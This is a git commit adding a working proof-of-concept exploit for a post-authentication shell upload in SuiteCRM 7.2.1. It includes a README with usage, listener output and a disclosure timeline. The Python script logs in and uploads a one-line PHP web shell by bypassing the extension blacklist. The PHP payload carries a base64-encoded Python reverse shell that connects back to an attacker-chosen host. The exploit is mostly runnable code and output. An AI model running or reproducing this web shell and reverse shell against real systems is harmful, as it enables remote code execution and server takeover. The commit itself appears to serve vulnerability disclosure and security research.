Add SuiteShell

David Davidson · David Davidson · commit c3deb8272204 · 2015-05-20T09:41:38.000Z
diff --git a/README.md b/README.md
@@ -13,6 +13,7 @@ Miscellaneous proof of concept exploit code written at Xiphos Research for testi
 * nmediapwn - Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload
 * pwnflow - Wordpress Work the flow file upload 2.5.2 Shell Upload
 * delusions - Wordpress InfusionSoft Gravity Forms Shell Upload (CVE-2014-6446)
+* suiteshell - SuiteCRM Post-Auth Remote Code Execution (CVE-2015-NOTYET)
 * TBA
 
 ## Infrequently Asked Questions.
diff --git a/suiteshell/README.md b/suiteshell/README.md
@@ -0,0 +1,57 @@
+# Exploit for SuiteCRM Post-Authentication Shell Upload
+SuiteCRM suffers a post-authentication shell upload vulnerability in its "Upload Company Logo" functionality, wherin it uses a blacklist in an attempt to prevent the upload of executable code. Furthermore, its "check for valid image" test leaves uploaded files in a tempdir that is web accessible. It is possible to bypass the blacklist to upload executable PHP code with the "phtml" extension to this temporary directory and thus gain code execution under the context of the webserver user on the affected system. This vulnerability was discovered by Darren Martyn of Xiphos Research Ltd. while assessing the SuiteCRM software. The version tested was "suitecrm-7.2.1-max", as available on the SuiteCRM website on the 5/5/2015.
+
+## Usage
+
+To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the 
+"payload.php". You also must specify a callback host and port, along with the URL to the vulnerable SuiteCRM installation, and a valid username and password for an administrative 
+user.
+
+Example Use:
+```
+xrl:~$ python2 suiteshell.py http://192.168.2.111/suitecrm-7.2.1-max/ admin admin back_python.php 192.168.2.116 1337
+
+███████╗██╗   ██╗██╗████████╗███████╗███████╗██╗  ██╗███████╗██╗     ██╗     
+██╔════╝██║   ██║██║╚══██╔══╝██╔════╝██╔════╝██║  ██║██╔════╝██║     ██║     
+███████╗██║   ██║██║   ██║   █████╗  ███████╗███████║█████╗  ██║     ██║     
+╚════██║██║   ██║██║   ██║   ██╔══╝  ╚════██║██╔══██║██╔══╝  ██║     ██║     
+███████║╚██████╔╝██║   ██║   ███████╗███████║██║  ██║███████╗███████╗███████╗
+╚══════╝ ╚═════╝ ╚═╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝
+Exploit for SuiteCRM Post-Auth Shell Upload Version: 20150512.1
+{+} Logging into the CRM...
+{+} Uploading our shell...
+{+} Probing for our shell...
+{+} Shell located and functioning at http://192.168.2.111/suitecrm-7.2.1-max/upload/tmp_logo_company_upload/suiteshell.phtml
+{*} Sending our payload...
+{+} Using 192.168.2.116:1337 as callback...
+{+} Dropping shell...
+{+} Shell dropped... Triggering...
+{+} got shell?
+xrl:~$
+```
+Listener (I suggest using the [tcp-pty-shell-handler][shellhandle]):
+```
+xrl:~$ python2 /tmp/testing/python-pty-shells/tcp_pty_shell_handler.py -b 0.0.0.0:1337
+Got root yet?
+Linux hackthecrm 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32:01 UTC 2015 i686 i686 i686 GNU/Linux
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+<suitecrm-7.2.1-max/upload/tmp_logo_company_upload$  cat suiteshell.phtml
+<?php @assert(filter_input(0,woot,516)); ?>
+<suitecrm-7.2.1-max/upload/tmp_logo_company_upload$
+```
+
+## Screenshot
+![lol shell](https://raw.githubusercontent.com/XiphosResearch/exploits/master/suiteshell/screenshot/SuiteShell.png)
+
+## Disclosure Timeline:
+* 05/05/2015: Vulnerability discovered and validated. SuiteCRM contacted via twitter asking for a security contact.
+* 06/05/2015: SuiteCRM provide security contact, vulnerability details sent.
+* 06/05/2015: SuiteCRM respond and let me know I will be kept in the loop.
+* 12/05/2015: No contact from SuiteCRM, automated PoC exploit written and provided along with notification of intent to request a CVE on 20/05/2015
+* 20/05/2015: Deadline expires. Publish PoC and request CVE.
+
+## Licence
+Licenced under the [WTFPL][wtfpl]
+
+[wtfpl]: http://www.wtfpl.net/
+[shellhandle]: https://github.com/infodox/python-pty-shells
diff --git a/suiteshell/back_python.php b/suiteshell/back_python.php
@@ -0,0 +1,13 @@
+<?php
+$cbhost = $_COOKIE['host'];
+$cbport = $_COOKIE['port'];
+echo "{+} Using ".$cbhost.":".$cbport." as callback...\n{+} Dropping shell...\n";
+$shell = 
+"IyEvdXNyL2Jpbi9weXRob24yCiMgY29kaW5nOiB1dGYtOAojIFNlbGYgRGVzdHJ1Y3RpbmcsIERhZW1vbmluZyBSZXZlcnNlIFBUWS4KIyBybSdzIHNlbGYgb24gcXVpdCA6MwojIFRPRE86CiMgMTogQWRkIGNyeXB0bwojIDI6IEFkZCBwcm9jbmFtZSBzcG9vZgppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcHR5CmltcG9ydCBzb2NrZXQKaW1wb3J0IGNvbW1hbmRzCgpzaGVsbG1zZyA9ICJceDFiWzBtXHgxYlsxOzM2bUdvdCByb290IHlldD9ceDFiWzBtXHJcbiIgIyBuZWVkeiBhc2NpaQoKZGVmIHF1aXR0ZXIobXNnKToKICAgIHByaW50IG1zZwogICAgb3MudW5saW5rKG9zLnBhdGguYWJzcGF0aChfX2ZpbGVfXykpICMgdW5jb21tZW50IGZvciBnb2dvc2VsZmRlc3RydWN0CiAgICBzeXMuZXhpdCgwKQoKZGVmIHJldmVyc2UoY2Job3N0LCBjYnBvcnQpOgogICAgdHJ5OgogICAgICAgIHVuYW1lID0gY29tbWFuZHMuZ2V0b3V0cHV0KCJ1bmFtZSAtYSIpCiAgICAgICAgaWQgPSBjb21tYW5kcy5nZXRvdXRwdXQoImlkIikKICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgcXVpdHRlcignZ3JhYiB1bmFtZS9pZCBmYWlsJykKICAgIHRyeToKICAgICAgICBzb2NrID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgIHNvY2suY29ubmVjdCgoY2Job3N0LCBpbnQoY2Jwb3J0KSkpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGNvbm5lY3Rpb24gZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAwKQogICAgICAgIG9zLmR1cDIoc29jay5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHNvY2suZmlsZW5vKCksIDIpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGR1cDIgZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MucHV0ZW52KCJISVNURklMRSIsICIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIsICcvdXNyL2xvY2FsL3NiaW46L3Vzci9zYmluOi9zYmluOi9iaW46L3Vzci9sb2NhbC9iaW46L3Vzci9iaW4nKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHV0ZW52IGZhaWwnKQogICAgdHJ5OgogICAgICAgIHNvY2suc2VuZChzaGVsbG1zZykKICAgICAgICBzb2NrLnNlbmQoJ1x4MWJbMTszMm0nK3VuYW1lKyJcclxuIitpZCsiXHgxYlswbVxyXG4iKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdzZW5kIGlkL3VuYW1lIGZ1Y2t1cCcpCiAgICB0cnk6CiAgICAgICAgcHR5LnNwYXduKCcvYmluL2Jhc2gnKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHR5IHNwYXduIGZhaWwnKQogICAgcXVpdHRlcigncXVpdHRpbmcsIGNsZWFudXAnKQoKZGVmIG1haW4oYXJncyk6CiAgICBpZiBvcy5mb3JrKCkgPiAwOiAKICAgICAgICBvcy5fZXhpdCgwKQogICAgcmV2ZXJzZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgbWFpbihzeXMuYXJndikK";
+$x = fopen("/tmp/x", "w+");
+fwrite($x, base64_decode($shell));
+fclose($x);
+echo "{+} Shell dropped... Triggering...\n";
+system("python /tmp/x ".$cbhost." ".$cbport);
+die('{+} got shell?'); // payload should have rm'd itself
+?>
diff --git a/suiteshell/screenshot/SuiteShell.png b/suiteshell/screenshot/SuiteShell.png
diff --git a/suiteshell/suiteshell.py b/suiteshell/suiteshell.py
@@ -0,0 +1,102 @@
+#!/usr/bin/python2
+# coding: utf-8
+# Author: Darren Martyn, Xiphos Research Ltd.
+# Version: 20150512.1
+# Licence: WTFPL - wtfpl.net
+import requests
+import sys
+__version__ = "20150512.1"
+
+def banner():
+    print """\x1b[1;32m
+███████╗██╗   ██╗██╗████████╗███████╗███████╗██╗  ██╗███████╗██╗     ██╗     
+██╔════╝██║   ██║██║╚══██╔══╝██╔════╝██╔════╝██║  ██║██╔════╝██║     ██║     
+███████╗██║   ██║██║   ██║   █████╗  ███████╗███████║█████╗  ██║     ██║     
+╚════██║██║   ██║██║   ██║   ██╔══╝  ╚════██║██╔══██║██╔══╝  ██║     ██║     
+███████║╚██████╔╝██║   ██║   ███████╗███████║██║  ██║███████╗███████╗███████╗
+╚══════╝ ╚═════╝ ╚═╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝
+Exploit for SuiteCRM Post-Auth Shell Upload Version: %s\x1b[0m""" %(__version__)
+
+
+def upload_shell(base_url, username, password):
+    url = base_url + "index.php"
+    s = requests.Session()
+    data = {'module': 'Users',
+            'action': 'Authenticate',
+            'return_module': 'Users',
+            'return_action': 'Login',
+            'cant_login': '',
+            'login_module': '',
+            'login_action': '',
+            'login_record': '',
+            'login_token': '',
+            'login_oauth_token': '',
+            'login_mobile': '',
+            'login_language': 'en_us',
+            'user_name': username,
+            'user_password': password,
+            'Login': 'Log In'}
+    print "\x1b[1;32m{+} Logging into the CRM...\x1b[0m"
+    try:
+        r = s.post(url=url, data=data)
+    except Exception, e:
+        sys.exit("\x1b[1;31m{-} Something failed. Stacktrace coming...\n\x1b[0m %s" %(str(e)))
+    if r.status_code == 200:
+        pass
+    else:
+        sys.exit("\x1b[1;31m{-} Something went wrong...\x1b[0")
+    files={"file_1":("suiteshell.phtml", "<?php @assert(filter_input(0,woot,516)); ?>")}
+    data = {'entryPoint': 'UploadFileCheck',
+            'forQuotes': 'false'}
+    print "\x1b[1;32m{+} Uploading our shell...\x1b[0m"
+    try:
+        r = s.post(url=url, data=data, files=files)
+    except Exception, e:
+        sys.exit("\x1b[1;31m{-} Something failed. Bollocks. Stacktrace coming...\n\x1b0m %s" %(str(e)))
+    if r.status_code == 200:
+        pass
+    else:
+        sys.exit("\x1b[1;31m{-} Something went wrong...\x1b[0m")
+    shell_url = base_url + "upload/tmp_logo_company_upload/suiteshell.phtml"
+    print "\x1b[1;32m{+} Probing for our shell...\x1b[0m"
+    try:
+        r = s.post(url=shell_url, data={"woot": "eval(base64_decode('ZWNobyBtZDUoJ3B3bmVkJyk7'))"})
+    except Exception, e:
+        sys.exit("\x1b[1;31m{-} Could not connect to shell... printing backtrace...\n\x1b[0m %s" %(str(e)))
+    if "5e93de3efa544e85dcd6311732d28f95" in r.text:
+        print "\x1b[1;32m{+} Shell located and functioning at %s\x1b[0m" %(shell_url)
+        return shell_url
+    else:
+        sys.exit("\x1b[1;31m{-} Could get response from the shell. Bailing...\x1b[0m")
+
+def php_encoder(php):
+    f = open(php, "r").read()
+    f = f.replace("<?php", "")
+    f = f.replace("?>", "")
+    encoded = f.encode('base64')
+    encoded = encoded.replace("\n", "")
+    encoded = encoded.strip()
+    code = "eval(base64_decode('%s'));" %(encoded)
+    return code
+
+def spawn_backconnect(shell_url, payload, cb_host, cb_port):
+    cookies = {'host': cb_host, 'port': cb_port}
+    data = {'woot': payload}
+    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'}
+    try:
+        print "\x1b[1;32m{*} Sending our payload...\x1b[0m"
+        r = requests.post(url=shell_url, data=data, headers=headers, verify=False, cookies=cookies)
+    except Exception, e:
+        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
+    if r.text:
+        print r.text
+
+def main(args):
+    banner()
+    if len(args) != 7:
+        sys.exit("usage: %s <base url> <username> <password> <payload> <connectback host> <connectback port>" %(args[0]))
+    shell_url = upload_shell(base_url=args[1], username=args[2], password=args[3])
+    spawn_backconnect(shell_url, payload=php_encoder(args[4]), cb_host=args[5], cb_port=args[6])
+
+if __name__ == "__main__":
+    main(args=sys.argv)
